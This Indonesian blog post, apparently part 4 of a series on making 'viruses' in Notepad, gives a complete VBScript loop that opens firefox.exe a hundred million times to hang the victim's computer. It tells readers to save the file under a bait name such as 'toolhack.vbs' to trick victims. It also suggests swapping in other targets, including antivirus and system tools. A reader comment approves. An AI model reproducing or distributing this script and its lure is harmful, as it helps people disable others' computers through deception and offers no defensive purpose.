Social Icons

Pages

13/09/10

Membuat virus menggunakan notepad part 4


seperti postingan yang sebelumnya tentang membuat virus melalui note pad, kali ini gw kasih script baru untuk membuat virus, script ini simple tapi lumayan "ganas" kenapa di bilang ganas,karena bakaln bikin komputer yang terinfectsi hang total.. penasaran silahkan coba aja sendiri :

1. copas(copy paste) script di bawah ini di notepad

option explicit

dim wshshell

set wshshell=wscript.createobject("wscript.shell")

dim x

for x = 1 to 100000000

wshshell.run "firefox.exe"

next

2. Save notepad ( ”save as type” diubah ke ”all files”) beri nama yang menarik korban contoh "toolhack.vbs" yang penting akhirannya ".vbs"

3.Finish.. ingat klo ga mau ke infect jangan sekali2 klik file yang tadi sudah dibuat karena klo di klik maka komputer bakalan membuka aplikasi "firefox.exe" sebanyak 100000000 kali, nah ini yang bikin komputer jadi ngehank, tapi klo penaaran virus ini bekerja apa engga nya bisa ubah "for x = 1 to 100000000" menjadi "for x = 1 to 10" maka setelah di klik file tadi, desktop akan dipenuhi oleh 10 aplikasi firefox.

4.script di atas gw kasih contoh untuk membuka/infect komputer melalui aplikasi "firefox.exe", mengingat banyak komputer mengunakan aplikasi ini, tapi klo anda anda semua mau menggatinya dengan yang lain bisa saja. bahkan antiviru pun bisa kena tuh.. hahahaha nech klo mau nyoba2 yang lain gw kasih dechh!!

recomend file nya :

"explorer.exe"

"gpedit.msc"

"anvas.exe"

"mpc-hc.exe"

"NeroStartSmart.exe"

"cmd.exe"

"msconfig.exe"

"smadav.exe"

"IEXPLORE.EXE"

"EXCEL.EXE"

"OUTLOOK.EXE"

"WINWORD.EXE"

yang lainya bisa ditambahin sendiri, trus buat string file yang kebuka for x = 1 to "100000000" bisa di ubah sesuai keinginan mau berapa banyak file yang di buak ter gantung selera..

selamat mencoba

1 komentar:

Anonim mengatakan...

kecil tapi sadis

 
Blogger Templates